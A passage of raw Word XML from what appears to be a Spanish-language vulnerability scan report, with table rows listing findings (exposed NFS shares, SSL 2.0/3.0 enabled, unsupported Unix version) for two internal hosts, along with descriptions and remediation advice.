              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14837893" w14:textId="77777777" w:rsidR="00343B24" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2CEE7F7C" w14:textId="56A50A28" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC6AE5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>192.168.2.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="549D86CC" w14:textId="47D5486E" w:rsidR="00343B24" w:rsidRPr="007B2D98" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B2D98">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>NFS Exported Share Information Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61EC1C3D"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3A491647" w14:textId="3CB79822" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">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20E8774A" w14:textId="690AB8A2" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B2D98">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>El host de escaneo podría montar al menos uno de los recursos compartidos de NFS exportados por el servidor remoto. Un atacante puede aprovechar esto para leer (y posiblemente escribir) archivos en el host remoto.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3718" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11350F07" w14:textId="53513CA7" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B2D98">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Configure NFS en el host remoto para que solo los hosts autorizados puedan montar sus recursos compartidos remotos</w:t>
            </w:r>
            <w:r w:rsidRPr="00F26227">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F2B55" w:rsidRPr="0076603F" w14:paraId="5CD72508" w14:textId="77777777" w:rsidTr="00343B24">
        <w:trPr>
          <w:trHeight w:val="147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3E32A43A" w14:textId="77777777" w:rsidR="005F2B55" w:rsidRDefault="00343B24"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Pr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>2.102</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A8A0A01" w14:textId="39333072" w:rsidR="00DD5B4A" w:rsidRPr="00F26227" w:rsidRDefault="00DD5B4A" w:rsidP="00250C4A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>192.168.2.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CAEA08D" w14:textId="19070088" w:rsidR="005F2B55" w:rsidRPr="007B2D98" w:rsidRDefault="007B2D98" w:rsidP="00250C4A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B2D98">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>SSL Version 2 and 3 Protocol Detection</w:t>
            </w:r>
            <w:r w:rsidRPr="007B2D98">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:cr/>
            </w:r>
            <w:r w:rsidR="003C592E">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> (SMTP y </w:t>
            </w:r>
            <w:r w:rsidR="004A3343">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>PostgreSQL</w:t>
            </w:r>
            <w:r w:rsidR="003C592E">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ED26CE1" w14:textId="77777777" w:rsidR="005F2B55"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Critico</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52523968" w14:textId="3934135D" w:rsidR="00742C21" w:rsidRPr="00F26227" w:rsidRDefault="00742C21" w:rsidP="00C8634D">
            <w:pP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52AD9FE8" w14:textId="2321D4CA" w:rsidR="007B2D98" w:rsidRPr="007B2D98"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t>El servicio remoto acepta conexiones cifradas mediante SSL 2.0 y/o SSL 3.0. Estas versiones de SSL son</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007B2D98">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>afectad</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve">as </w:t>
            </w:r>
            <w:r w:rsidRPr="007B2D98">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>por varias fallas criptográficas, que incluyen:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69DC66BD" w14:textId="77777777" w:rsidR="007B2D98" w:rsidRPr="007B2D98"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t>- Un esquema de relleno inseguro con cifrados CBC.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="475E4A3C" w14:textId="77777777" w:rsidR="007B2D98" w:rsidRPr="007B2D98"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t>- Esquemas inseguros de renegociación y reanudación de sesiones.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B43D86B" w14:textId="36DCD51F" w:rsidR="007B2D98" w:rsidRPr="007B2D98"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t>Un atacante puede explotar estas fallas para realizar ataques de intermediario o para descifrar las comunicaciones</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007B2D98">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>entre el servicio afectado y los clientes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4970FFDB" w14:textId="722B1F87" w:rsidR="007B2D98" w:rsidRPr="007B2D98"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lastRenderedPageBreak/>
              <w:t>Aunque SSL/TLS tiene un medio seguro para elegir la versión más compatible del protocolo (por lo que estas versiones se usarán solo si el cliente o el servidor no admiten nada mejor), muchos navegadores web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007B2D98">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>implementa</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
            <w:r w:rsidRPr="007B2D98">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> esto de una manera insegura que permita a un atacante degradar una conexión (como en POODLE).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F145F2F" w14:textId="77777777" w:rsidR="007B2D98" w:rsidRPr="007B2D98"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t>Por lo tanto, se recomienda que estos protocolos se deshabiliten por completo.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3771321C" w14:textId="7A38DAB4" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="007B2D98" w:rsidP="007B2D98">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B2D98">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>NIST ha determinado que SSL 3.0 ya no es aceptable para comunicaciones seguras. A partir de la fecha de</w:t>
            </w:r>
            <w:r w:rsidR="003C592E">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007B2D98">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>cumplimiento que se encuentra en PCI DSS v3.1, cualquier versión de SSL no cumplirá con la definición de PCI SSC de 'fuerte</w:t>
            </w:r>
            <w:r w:rsidR="003C592E">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007B2D98">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>criptografía'.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3718" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="447564F5" w14:textId="77777777" w:rsidR="003C592E" w:rsidRPr="003C592E" w:rsidRDefault="003C592E" w:rsidP="003C592E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C592E">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Consulte la documentación de la aplicación para deshabilitar SSL 2.0 y 3.0.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C9C2229" w14:textId="3E389229" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="003C592E" w:rsidP="003C592E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C592E">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve">Utilice TLS 1.2 (con conjuntos de </w:t>
            </w:r>
            <w:r w:rsidR="004A3343" w:rsidRPr="003C592E">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>cifrados aprobados</w:t>
            </w:r>
            <w:r w:rsidRPr="003C592E">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>) o superior en su lugar.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00343B24" w:rsidRPr="0076603F" w14:paraId="60B467E6" w14:textId="77777777" w:rsidTr="006668AF">
        <w:trPr>
          <w:trHeight w:val="1885"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="649EB6E4" w14:textId="77777777" w:rsidR="00343B24" w:rsidRDefault="00343B24" w:rsidP="00DD5B4A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="24AAA51C" w14:textId="77777777" w:rsidR="00343B24" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FB7A0E">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>192.168.2.102</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44B48F34" w14:textId="72779AFF" w:rsidR="00DD5B4A" w:rsidRPr="00F26227" w:rsidRDefault="00DD5B4A" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FB7A0E">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>192.168.2.10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DE69BED" w14:textId="08518B2E" w:rsidR="00343B24" w:rsidRPr="00742C21" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742C21">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Unix Operating System Unsupported Version Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68368EC6"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72F8AB5C" w14:textId="73FC3A30" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pP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25798CAF" w14:textId="07A9BCA8" w:rsidR="00343B24" w:rsidRPr="00742C21" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742C21">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve">De acuerdo con su número de versión </w:t>
            </w:r>
            <w:r w:rsidR="004A3343" w:rsidRPr="00742C21">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>auto informado</w:t>
            </w:r>
            <w:r w:rsidRPr="00742C21">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>, el sistema operativo Unix que se ejecuta en el host remoto no es</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00742C21">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>ya soportado.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48D2E793" w14:textId="65F3C317" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742C21">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>La falta de soporte implica que el proveedor no lanzará nuevos parches de seguridad para el producto. Como resultado, es probable que contenga vulnerabilidades de seguridad.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3718" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E0AD5AE" w14:textId="355147D2" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
